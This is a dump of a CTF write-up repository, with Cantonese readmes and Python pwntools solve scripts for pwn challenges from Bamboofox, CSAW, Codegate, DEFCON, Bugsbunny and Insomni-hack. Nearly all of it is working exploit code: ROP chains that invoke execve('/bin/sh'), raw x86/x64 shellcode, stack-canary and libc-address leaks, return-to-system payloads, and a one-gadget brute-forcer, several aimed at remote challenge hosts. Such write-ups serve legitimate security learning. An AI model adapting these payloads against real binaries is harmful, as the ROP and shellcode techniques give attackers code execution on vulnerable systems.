| 31 | 32 | #rsi=0 33 | #rdx=0 34 | payload+=p64(pop_rax_ret)+p64(buf+0x200)+p64(pop_rdi)+p64(buf+0x300)+p64(rsi)+p64(buf+0x200)+p64(rdx)+p64(0x0)+p64(rsi)+p64(0x0)+p64(pop_rax_ret)+p64(0x3b)+p64(syscall) 35 | 36 | sleep(1) 37 | r.sendline(payload) 38 | 39 | sleep(1) 40 | 41 | r.sendline("/bin/sh\x00") 42 | r.sendline("ls -al") 43 | 44 | r.interactive() 45 | 46 | #$ cd home 47 | #$ ls 48 | #ctf 49 | #$ cd ctf 50 | #$ ls 51 | #ctf 52 | #flag 53 | #infant-gogogo 54 | #$ cat flag 55 | #BAMBOOFOX{G0LaNg_iS_aw3s0m3ls!} 56 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gogogo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bamboofox 2017 infant-go/infant-gogogo.zip -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gotoheaven.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process('./infant-gogogo') 4 | #nc bamboofox.cs.nctu.edu.tw 58795 5 | 6 | host = "bamboofox.cs.nctu.edu.tw" 7 | port = 58796 8 | r = remote(host,port) 9 | #r=process("./infant-gotoheaven") 10 | #gdb.attach(r) 11 | 12 | payload="A"*224 13 | 14 | 15 | pop_rax_ret=0x0000000000404656 16 | #0x000000000043e71d : xchg eax, edi ; ret 17 | 18 | xchg_eax_edi=0x000000000043e71d 19 | syscall=0x00000000004553e9 20 | 21 | #0x00000000004143ed : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 22 | 23 | #0x0000000000408497 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 24 | 25 | pop_rdx_ret=0x00000000004143ed 26 | pop_rsi_ret=0x0000000000408497 27 | bss=0x0057d000+0x300 28 | 29 | #read 30 | #rax=0x0 31 | #rdi=fd=0 32 | #rsi=buf ok 33 | #rdx size ok 34 | payload+=p64(pop_rax_ret)+p64(bss+0x300)+p64(pop_rsi_ret)+p64(bss+0x300)+p64(pop_rdx_ret)+p64(0x8)+p64(pop_rsi_ret)+p64(bss+0x200)+p64(pop_rax_ret)+p64(0x0)+p64(xchg_eax_edi)+p64(pop_rax_ret)+p64(0)+p64(syscall) 35 | 36 | 37 | payload+=p64(pop_rax_ret)+p64(bss+0x300)+p64(pop_rsi_ret)+p64(bss+0x300)+p64(pop_rdx_ret)+p64(0x0)+p64(pop_rsi_ret)+p64(0)+p64(pop_rax_ret)+p64(bss+0x200)+p64(xchg_eax_edi)+p64(pop_rax_ret)+p64(0x3b)+p64(syscall) 38 | 39 | sleep(1) 40 | 41 | r.sendline(payload) 42 | sleep(1) 43 | 44 | r.sendline("/bin/sh\x00") 45 | 46 | r.sendline("ls -al") 47 | 48 | r.interactive() 49 | #BAMBOOFOX{GOLANG_PWnnnnnnnIng_iS_r3A11Y_W3iRdO_O} 50 | 51 | #execve 52 | #rax=0x3b 53 | #rdi bash 54 | #rsi =0 ok 55 | #rdx=0 ok 56 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gotoheaven.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bamboofox 2017 infant-go/infant-gotoheaven.zip -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/readme.md: -------------------------------------------------------------------------------- 1 | # Bamboofox 2017 infant-gogogo & infant-gotoheaven 2 | 3 | 4 | 兩條基本嘅buffer overflow with ROP不過係用golang compile, 算係1 set 向Seccon 2017 babystack致敬嘅題目 5 | 6 | 由於兩個都係static linked, 所以乜gadget都有,例如syscall, 只要跟住syscall table 汁藥就可以get shell 7 | 8 | 不過要留意好多gadget 都會對其他register 有operation 9 | 10 | 例如 infant-gogogo : 11 | 12 | ```C 13 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 14 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 15 | ``` 16 | 所以行呢句gadget 嘅時候要保證related register 唔係=0x0 17 | 18 | 例如: 19 | ```C 20 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 21 | ``` 22 | 23 | 就要保證RSI 唔係等於0x0 , 24 | 25 | 所以就要去bss 段求其塞d valid memory address去個d 相關register: 26 | 27 | For example: 28 | 29 | ```python 30 | payload="A"*256 31 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 32 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 33 | buf=0x0052e2a0 34 | rsi=0x0000000000408437 35 | rdx=0x0000000000413d6d 36 | #call read rdi :fd=0 37 | #rsi:buf 38 | #rdx:size 39 | #rax:0x00 40 | payload+=p64(pop_rax_ret)+p64(buf+0x200) 41 | payload+=p64(pop_rdi)+p64(0x0)+p64(rsi)+p64(buf+0x300) 42 | payload+=p64(rdx)+p64(0x8)+p64(pop_rax_ret)+p64(0)+p64(syscall) 43 | ``` 44 | 45 | # Solution : 46 | 47 | [infant-gogogo](infant-gogogo.py) 48 | 49 | 50 | [infant-gotoheaven](infant-gotoheaven.py) 51 | 52 | 53 | # Flag 54 | 55 | ``` 56 | infant-gogogo: BAMBOOFOX{G0LaNg_iS_aw3s0m3ls!} 57 | 58 | infant-gotoheaven : BAMBOOFOX{GOLANG_PWnnnnnnnIng_iS_r3A11Y_W3iRdO_O} 59 | 60 | ``` 61 | # Remark 62 | 如果ida pro F5唔到,可以試下 Option->Compiler sizeof(int)=4 63 | 64 | 65 | # Reference 66 | 67 | 1. http://shift-crops.hatenablog.com/entry/2017/12/09/200440 68 | 69 | 2. https://bbs.pediy.com/thread-223281.htm 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /ROP/Bugsbunnyctf Pwn100/pwn100: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bugsbunnyctf Pwn100/pwn100 -------------------------------------------------------------------------------- /ROP/Bugsbunnyctf Pwn100/readme.md: -------------------------------------------------------------------------------- 1 | # Bugsbunnyctf Pwn100 2 | 3 | 呢題其實唔難,不過比賽個陣炒左shellcode, 睇返writeup原來要自己打shellcode ༼☯﹏☯༽ 4 | 5 | checksec 6 | 7 | 冇NX冇canary 8 | 9 | ``` 10 | Arch: i386-32-little 11 | RELRO: Partial RELRO 12 | Stack: No canary found 13 | NX: NX disabled 14 | PIE: No PIE (0x8048000) 15 | ``` 16 | 17 | 有bufferoverflow vulnerability 18 | 19 | ret 係input+28之後 20 | 21 | input 係eax到 22 | 23 | ``` 24 | ────────────────────────────────── Registers ─────────────────────────────────── 25 | EAX: 0xffffd1f0 ('A' ) 26 | EBX: 0x0 27 | ECX: 0xfbad2288 28 | EDX: 0xf7fad87c --> 0x0 29 | ESI: 0x1 30 | EDI: 0xf7fac000 --> 0x1b2db0 31 | EBP: 0x41414141 ('AAAA') 32 | ESP: 0xffffd210 --> 0x0 33 | EIP: 0x41414141 ('AAAA') 34 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 35 | 36 | Legend: code, data, rodata, heap, value 37 | Stopped reason: SIGSEGV 38 | 0x41414141 in ?? () 39 | gdb-peda$ 40 | ```` 41 | 42 | ROPgadget: 43 | 44 | ``` 45 | 0x08048386 : call eax 46 | ``` 47 | 48 | 49 | shellcode: 50 | 51 | 52 | ```x86 53 | xor eax,eax 54 | xor ecx,ecx 55 | xor edx,edx 56 | xor esi,esi 57 | mov eax,0x0b 58 | lea ebx,[esp-8] 59 | int 0x80 60 | /bin/sh\x00 61 | 62 | ``` 63 | 64 | Sad~~~~~ 65 | 66 | # Reference 67 | 68 | 1.http://sw1ss.team/bugs_bunny_ctf_2k17/2017/07/31/bugs_bunny_ctf_2k17-pwn100/ 69 | 70 | -------------------------------------------------------------------------------- /ROP/Bugsbunnyctf Pwn100/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | host = "54.153.19.139" 4 | port = 5252 5 | 6 | #r = remote(host,port) 7 | r=process('./pwn100') 8 | 9 | call_eax=0x08048386 10 | ## 11 | shellcode="\x31\xC0\x31\xC9\x31\xD2\x31\xF6\xB8\x0B\x00\x00\x00\x8D\x5C\x24\xF8\xCD\x80" 12 | shellcode+= '/bin/sh\x00' 13 | payload="\x90"*(28-len(shellcode)) 14 | payload+=shellcode 15 | payload+=p32(call_eax) 16 | 17 | print len(payload) 18 | 19 | r.sendline(payload) 20 | 21 | r.sendline("ls -al") 22 | 23 | 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 100 scv/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 100 scv/libc-2.23.so -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 100 scv/readme.md: -------------------------------------------------------------------------------- 1 | # CSAW 2017 pwn 100 scv 2 | 3 | # 題目: 4 | 5 | 6 | > SCV 7 | > SCV is too hungry to mine the minerals. Can you give him some food? 8 | > nc pwn.chal.csaw.io 3764 9 | 10 | >[scv](scv) 11 | 12 | >[ibc-2.23.so](ibc-2.23.so) 13 | 14 | 15 | 呢題有少少煩,不過唔難 16 | 17 | Checksec: 18 | 19 | ``` 20 | Arch: amd64-64-little 21 | RELRO: Partial RELRO 22 | Stack: Canary found 23 | NX: NX enabled 24 | PIE: No PIE (0x400000) 25 | 26 | ``` 27 | IO dump: 28 | 29 | ``` 30 | ------------------------- 31 | [*]SCV GOOD TO GO,SIR.... 32 | ------------------------- 33 | 1.FEED SCV.... 34 | 2.REVIEW THE FOOD.... 35 | 3.MINE MINERALS.... 36 | ------------------------- 37 | >> 38 | 39 | ``` 40 | 41 | 有3個function: 42 | 43 | 1.入buffer 44 | 45 | 2.print buffer 46 | 47 | 3.exit 48 | 49 | 50 | Ida code (由於好多廢話,所以淨係留重點) 51 | 52 | ```C++ 53 | . 54 | . 55 | char buf; // [sp+10h] [bp-B0h]@6 56 | . 57 | . 58 | 59 | v23 = read(0, &buf, 248uLL); . 60 | 61 | ``` 62 | 63 | 有用嘅其實只有一/兩句,其他都係廢話 64 | 65 | 呢兩句identify 左有buffer overflow, buffer只有176 byte,但係可以讀248,仲唔死 66 | 67 | asm code: 68 | 69 | ```asm 70 | .text:0000000000400A96 buf = byte ptr -0B0h 71 | .text:0000000000400A96 var_8 = qword ptr -8 72 | .text:0000000000400A96 73 | .text:0000000000400A96 push rbp 74 | .text:0000000000400A97 mov rbp, rsp 75 | .text:0000000000400A9A sub rsp, 0C0h 76 | .text:0000000000400AA1 mov rax, fs:28h 77 | .text:0000000000400AAA mov [rbp+var_8], rax 78 | .text:0000000000400AAE xor eax, eax 79 | .text:0000000000400AB0 mov rax, cs:stdout 80 | 81 | ``` 82 | 83 | 我地知道canary 係rbp-8, 只要leak到canary,就可以任意寫return address, get shell 84 | 85 | 經過少少測試之後,會發現print buffer function會print多左8個位 or until \x00 86 | 87 | 我地知道嘅尾數係\x00, 所以我地只要寫到尾數做其他野就leak到canary 88 | 89 | leak canary payload= payload='b'*167+'a'+'g' 90 | 91 | 只要將leak到嘅canary減0x67(g),就等於canary number 92 | 93 | 下一步就係leak libc address.. 94 | 95 | 係之前d測試,除左發現會print多左8個位之外,我仲發現只要寫爛左canary,一禁exit 就可以stack check fail,姐係代表我地可以用exit return去其他return address,只要我地拎到canary, return address 就任我地寫 96 | 97 | 由於有nx,所以只可以rop + return to libc解決 98 | 99 | 由於係x64,x64有calling convention,puts係讀rdi嘅parameters,所以就一個pop_rdi_ret gadget mov puts or whatever got 入去,俾puts_plt print 100 | 101 | Print 完再彈返去main 102 | 103 | full gadget= pop_rdi_ret+PUTSGOT+PUTSPLT+main 104 | 105 | ```python 106 | 107 | payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main) 108 | 109 | ``` 110 | 111 | 112 | 呢到要注意一樣野,main係要跳返去initial variable個部份,不過因為個process冇熄過,所以canary同libcbase係唔會改 113 | 114 | 拎晒libc_base 之後,加返d offset,係入buffer個個位入: 115 | 116 | ```python 117 | 118 | payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(libc_bin_sh)+p64(system)+p64(main) 119 | 120 | ``` 121 | 122 | 禁exit 就會彈shell 123 | 124 | ``` 125 | flag: flag{sCv_0n1y_C0st_50_M!n3ra1_tr3at_h!m_we11} 126 | 127 | ``` 128 | -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 100 scv/scv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 100 scv/scv -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 100 scv/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | host = "pwn.chal.csaw.io" 4 | port = 3764 5 | r = remote(host,port) 6 | 7 | binary = ELF('./scv') 8 | PUTSPLT = binary.plt['puts'] 9 | PUTSGOT = binary.got['puts'] 10 | 11 | #flag{sCv_0n1y_C0st_50_M!n3ra1_tr3at_h!m_we11} 12 | 13 | print 'puts_plt = '+hex(PUTSPLT) 14 | 15 | print 'puts_got = '+hex(PUTSGOT) 16 | 17 | #r=process('./scv') 18 | 19 | #sleep(15) 20 | 21 | pop_rdi_ret=0x400ea3 22 | 23 | pop_rsi_r15_ret=0x400ea1 24 | 25 | puts=0x602018 26 | 27 | r.recvuntil(">>") 28 | 29 | 30 | r.sendline("1") 31 | 32 | r.recvuntil(">>") 33 | 34 | payload='b'*167+'a'+'g' 35 | 36 | r.send(payload) 37 | 38 | r.recvuntil(">>") 39 | 40 | 41 | r.sendline("2") 42 | 43 | #b *0x400aaa 44 | 45 | r.recvuntil('bbbbbbba') 46 | 47 | addr=r.recvuntil('\n') 48 | 49 | addr=addr[:-4:] 50 | 51 | print addr 52 | 53 | stri='0x' 54 | 55 | for i in range(len(addr)-1,-1,-1): 56 | temp=hex(ord(addr[i])) 57 | 58 | #print temp 59 | checker=int(temp,16) 60 | offset='' 61 | if(checker<0x10): 62 | offset+='0' 63 | 64 | 65 | temp=str(temp) 66 | 67 | temp=temp.split('x',1) 68 | 69 | stri+=offset 70 | stri+=temp[1] 71 | 72 | 73 | #print 'address of position '+str(send)+' '+stri 74 | 75 | 76 | dec=int(stri,16) 77 | hx=hex(dec) 78 | 79 | 80 | stack_chk_fail=0x60231C 81 | 82 | canary=int(hx,16) 83 | 84 | canary-=0x67 85 | 86 | print 'Canary = '+ hex(canary) 87 | 88 | main=0x400A96 89 | 90 | payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main) 91 | r.recvuntil(">>") 92 | 93 | r.sendline("1") 94 | 95 | r.recvuntil(">>") 96 | 97 | r.send(payload) 98 | 99 | r.recvuntil(">>") 100 | 101 | r.sendline("3") 102 | 103 | r.recvuntil("[*]BYE ~ TIME TO MINE MIENRALS...\n") 104 | 105 | stack_puts=r.recvuntil('\n') 106 | 107 | stack_puts=stack_puts[:-1:] 108 | 109 | stri='0x' 110 | 111 | for i in range(len(stack_puts)-1,-1,-1): 112 | temp=hex(ord(stack_puts[i])) 113 | 114 | #print temp 115 | checker=int(temp,16) 116 | offset='' 117 | if(checker<0x10): 118 | offset+='0' 119 | 120 | 121 | temp=str(temp) 122 | 123 | temp=temp.split('x',1) 124 | 125 | stri+=offset 126 | stri+=temp[1] 127 | 128 | 129 | #print 'address of position '+str(send)+' '+stri 130 | 131 | 132 | dec=int(stri,16) 133 | hx=hex(dec) 134 | 135 | print 'stack_puts_addr : '+hx 136 | 137 | libc = ELF('libc-2.23.so') 138 | 139 | puts__=int(hx,16) 140 | 141 | libc_base=puts__-libc.symbols['puts'] 142 | system=libc_base+libc.symbols['system'] 143 | 144 | offset_bin_sh=0x18CD17 145 | 146 | libc_bin_sh=libc_base+offset_bin_sh 147 | 148 | 149 | payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(libc_bin_sh)+p64(system)+p64(main) 150 | r.recvuntil(">>") 151 | 152 | r.sendline("1") 153 | 154 | r.recvuntil(">>") 155 | 156 | r.send(payload) 157 | 158 | r.recvuntil(">>") 159 | 160 | r.sendline("3") 161 | 162 | 163 | 164 | #r.recvuntil(">>") 165 | 166 | 167 | #r.sendline("3") 168 | 169 | 170 | 171 | r.interactive() 172 | -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 75 pilot/pilot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 75 pilot/pilot -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 75 pilot/readme.md: -------------------------------------------------------------------------------- 1 | # CSAW 2017 pwn 75 pilot 2 | 3 | # 題目: 4 | 5 | 6 | > pilot 7 | > Can I take your order? 8 | > nc pwn.chal.csaw.io 8464 9 | > 16:05 Eastern: Updated binary 10 | 11 | >[pilot](pilot) 12 | 13 | 呢題係google題,只要你中一個shellcode, 就get flag 14 | 15 | Checksec: 16 | 17 | ```pyrhon 18 | Arch: amd64-64-little 19 | RELRO: Partial RELRO 20 | Stack: No canary found 21 | NX: NX disabled 22 | PIE: No PIE (0x400000) 23 | ``` 24 | 25 | IO dump: 26 | 27 | ``` 28 | [*]Welcome DropShip Pilot... 29 | [*]I am your assitant A.I.... 30 | [*]I will be guiding you through the tutorial.... 31 | [*]As a first step, lets learn how to land at the designated location.... 32 | [*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics... 33 | [*]Good Luck Pilot!.... 34 | [*]Location:0x7fffffffe070 35 | [*]Command:aaaaaaaaaaa 36 | 37 | ```` 38 | 39 | 40 | 呢題冇開nx, 可以run shellcode, 41 | 42 | check 0x7fffffffe070係指去乜地方先 43 | 44 | 45 | stack dump 46 | ``` 47 | ──────────────────────────────────────── Stack ──────────────────────────────────────── 48 | 0000| 0x7fffffffe070 ('a' , "\n") 49 | 0008| 0x7fffffffe078 --> 0xa616161 ('aaa\n') 50 | 51 | 52 | ``` 53 | 54 | 原來係指去input buffer address -_- 55 | 56 | exploit就係:shellcode+padding+input buffer address 57 | 58 | padding='\x90'*(40-len(shellcode)) 59 | 60 | 其中40係buffersize+RBP 61 | 62 | 作為一個小薯,之後嘅動作當然係上shellstorm 抄shellcode 63 | 64 | 大概copy and paste 左10條shellcode左右就get shell,亦都係呢條題目嘅難點 =_= 65 | 66 | ``` 67 | flag: flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys} 68 | 69 | ``` 70 | 71 | 72 | -------------------------------------------------------------------------------- /ROP/CSAW 2017 pwn 75 pilot/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | host = "pwn.chal.csaw.io" 4 | port = 8464 5 | r = remote(host,port) 6 | #r=process('./pilot') 7 | 8 | #sleep(8) 9 | 10 | r.recvuntil("Pilot!....\n") 11 | 12 | stringgg=r.recvuntil("\n") 13 | 14 | addr=stringgg[12:] 15 | 16 | print addr 17 | 18 | base=int(addr,16) 19 | 20 | 21 | r.recvuntil("Command:") 22 | 23 | #flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys} 24 | 25 | #buffer=40 26 | 27 | shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" 28 | print len(shellcode) 29 | 30 | payload=shellcode+'\x90'*(40-len(shellcode))+p64(base) 31 | 32 | r.sendline(payload) 33 | 34 | r.sendline("ls -al") 35 | 36 | 37 | r.interactive() 38 | -------------------------------------------------------------------------------- /ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/4b9a5f57118bcfb6db1d0991af9e4159: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/4b9a5f57118bcfb6db1d0991af9e4159 -------------------------------------------------------------------------------- /ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/libc.so.6 -------------------------------------------------------------------------------- /ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #ELF=ELF("./BaskinRobins31") 4 | libc=ELF("./libc.so.6") 5 | 6 | PUTSPLT = 0x4006c0+3 7 | PUTSGOT = 0x000000000602020 8 | 9 | main=0x0000000000400A4B 10 | 11 | #nc ch41l3ng3s.codegate.kr 3131 12 | 13 | pop_rdi_ret=0x0000000000400bc3 14 | pop_rdi_rsi_rdx_ret=0x000000000040087a 15 | mov_eax_0=0x0000000000400b54 16 | offset =184 17 | 18 | host = "ch41l3ng3s.codegate.kr" 19 | port = 3131 20 | r = remote(host,port) 21 | #r=process("./BaskinRobins31") 22 | #gdb.attach(r) 23 | pause() 24 | r.recvuntil("3)\n") 25 | 26 | r.sendline("2"+"a"*180+"x"*3+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main)) 27 | r.recvuntil(p64(main)) 28 | r.recvuntil("\n") 29 | r.recvuntil("\n") 30 | leak=r.recvuntil("\n") 31 | leak=u64(leak[:-1].ljust(8,"\x00")) 32 | print hex(leak) 33 | libc_base=leak-libc.symbols['puts'] 34 | one=libc_base+0x45216 35 | xor_rax=libc_base+0x000000000008b8c5 36 | print "one "+hex(one) 37 | pause() 38 | # leak=int(leak,16) 39 | # print "leak put "+hex(leak) 40 | 41 | r.sendline("2"+"a"*180+"x"*3+p64(xor_rax)+p64(one)) 42 | 43 | r.interactive() 44 | 45 | # ### This game is similar to the BaskinRobins31 game. ### 46 | # ### The one that take the last match win ### 47 | # There are 31 number(s) 48 | # How many numbers do you want to take ? (1-3) 49 | # 2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�\x00\x00\x00\x00\x00\x00aaaaaaaaaaaaaxxx\xa4\x03\x1b\x7f\x00\x00\x16\xa2\x9f\x03\x1b\x7f\x00\x00 50 | 51 | # $ ls 52 | # BaskinRobins31 53 | # flag 54 | # $ cat flag 55 | # flag{The Korean name of "Puss in boots" is "My mom is an alien"} 56 | # $ 57 | 58 | -------------------------------------------------------------------------------- /ROP/Defcon_crashme/readme.md: -------------------------------------------------------------------------------- 1 | From IDA pro,we know that, we have to enter this string: 2 | 3 | Smash me outside, how bout dAAAAAAAAAAA 4 | 5 | with 39 length to the question, the function will scan the inputed string,if it contain this, 6 | 7 | jump to return 8 | 9 | make use of the crashoff function from GDB, 10 | 11 | we merged the pattern with the generated one 12 | 13 | and obtained crashoff =72 14 | 15 | $ebp+8 is the return address 16 | 17 | set break point to the return, 18 | 19 | use info reg 20 | 21 | we can see that rdi register currently pointed to the string we entered 22 | 23 | use ROPGadget to search 'jmp rdi' 24 | 25 | construct our exploit as 26 | 27 | shellcode+string+junk make it to 72+gadget address 28 | 29 | exploit 30 | -------------------------------------------------------------------------------- /ROP/Defcon_crashme/smashme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Defcon_crashme/smashme -------------------------------------------------------------------------------- /ROP/Defcon_crashme/smashme.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./smashme') 4 | 5 | #shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 6 | 7 | shellcode="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" 8 | 9 | jmp_rdi=0x00000000004c4e1b 10 | 11 | phrase='Smash me outside, how bout dAAAAAAAAAAA' 12 | 13 | payload=shellcode+phrase+'A'*6+p64(jmp_rdi) 14 | 15 | 16 | 17 | r.sendline(payload) 18 | 19 | #not work here 20 | #address_read_plt=int(r.recvline(keepends=False),16) 21 | 22 | #receive the 4 byte from the process and print it out 23 | #address_read_plt=unpack(r.recv(4)) 24 | 25 | 26 | #r.sendline('ls') 27 | r.interactive() 28 | -------------------------------------------------------------------------------- /ROP/Defcon_r0pbaby/readme.md: -------------------------------------------------------------------------------- 1 | libc.so.6: 0x00007FFFF7FF59B0 2 | 3 | Step1: 4 | 5 | 6 | 7 | Step2: 8 | Symbol system: 0x00007FFFF7876460 9 | 10 | target:execute system(bin/sh) 11 | 12 | find bin/sh 13 | 14 | gdb-peda$ find /bin/sh 15 | 16 | Found 6 results, display max 6 items: 17 | 18 | [heap] : 0x555555757040 ("/bin/sh\n") 19 | 20 | [heap] : 0x555555757462 --> 0x68732f6e69622f ('/bin/sh') 21 | 22 | libc : 0x7ffff7998879 --> 0x68732f6e69622f ('/bin/sh') 23 | 24 | [stack] : 0x7fffffffb787 ("/bin/sh: 0x", '0' , "\n") 25 | 26 | [stack] : 0x7fffffffda72 --> 0x68732f6e69622f ('/bin/sh') 27 | 28 | [stack] : 0x7fffffffde20 --> 0x68732f6e69622f ('/bin/sh') 29 | 30 | gdb-peda$ x/s 0x7ffff7998879 31 | 32 | 0x7ffff7998879: "/bin/sh" 33 | 34 | 35 | offset_for_bin_sh=0x00007FFFF7FF59B0-0x7ffff7998879 36 | 37 | 38 | offset_for_system=0x00007FFFF7FF59B0-0x00007FFFF7876460 39 | 40 | 41 | 42 | Step3: 43 | 44 | Because x64 is put the position to rdi instead of passing paratmeters, 45 | 46 | so rquires gadgets requires pop rdi to pop address to rdi 47 | 48 | 49 | root@kali:~/Documents/CTF# ROPgadget --binary r0pbaby > log.txt 50 | 51 | root@kali:~/Documents/CTF# cat log.txt |grep pop 52 | 53 | 54 | Reference: 55 | 56 | https://blog.skullsecurity.org/2015/defcon-quals-r0pbaby-simple-64-bit-rop 57 | 58 | http://qiita.com/MarshMallow_sh/items/87019f038e4f5dc82451 59 | 60 | https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/DEFCONCTF/babysfirst/r0pbaby 61 | -------------------------------------------------------------------------------- /ROP/Insomni-hack teaser 2018 onecall/brute_force.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r = remote("onecall.teaser.insomnihack.ch", 1337) 4 | #616 5 | for i in range (0x9b958, 1000000): 6 | #i = int("3d714", 16) 7 | r = process("./qemu-aarch64 -nx -L ./ ./onecall", shell=True) 8 | 9 | libcbase = 0 10 | while True: 11 | line = r.readline() 12 | if "lib/libc.so.6" in line: 13 | libcbase = int(line[0:16], 16) 14 | break 15 | 16 | elf = ELF("lib/libc.so.6") 17 | 18 | #for symbol in sorted(elf.symbols): 19 | # print symbol 20 | 21 | sleep = i#elf.symbols["usleep"] 22 | execve = elf.symbols["execve"] 23 | 24 | if i % 20 == 0: 25 | print "i = " + hex(i) 26 | print i 27 | print hex(i) 28 | print hex(libcbase) 29 | r.sendline(p64(i+libcbase)) 30 | r.sendline("ls -al") 31 | r.interactive() 32 | 33 | rv = r.recvall() 34 | if "Illegal instruction" in rv or "Segmentation fault" in rv: 35 | continue 36 | else: 37 | print "dla i=" + str(i) 38 | print rv 39 | #r.interactive() 40 | -------------------------------------------------------------------------------- /ROP/Insomni-hack teaser 2018 onecall/onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Insomni-hack teaser 2018 onecall/onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz -------------------------------------------------------------------------------- /ROP/Insomni-hack teaser 2018 onecall/readme.md: -------------------------------------------------------------------------------- 1 | # Insomni-hack teaser 2018 onecall 2 | 3 | 題目都話明係onecall,當然係要用one gadget rce做啦(???? 4 | 5 | 不過因為係arm, 所以冇tools 直接output gadget 6 | 7 | 8 | 唔緊要我地可以撞(???????? 9 | 10 | 11 | 拖個libc入ida,search "/bin/sh", 入到d code, xref到頂,由個堆addr 開始brute force 12 | 13 | 撞一個鐘就可以get shell 14 | 15 | ``` 16 | flag: INS{did_you_gets_here_by_chance?} 17 | ``` 18 | 19 | 20 | # Intended Solution 21 | 22 | 1. https://ntropy-unc.github.io/exploit/pwn/gets/rop/aarch64/arm/magic/gadget/writeup/post/2018/01/21/OneCall.html 23 | 24 | 2. 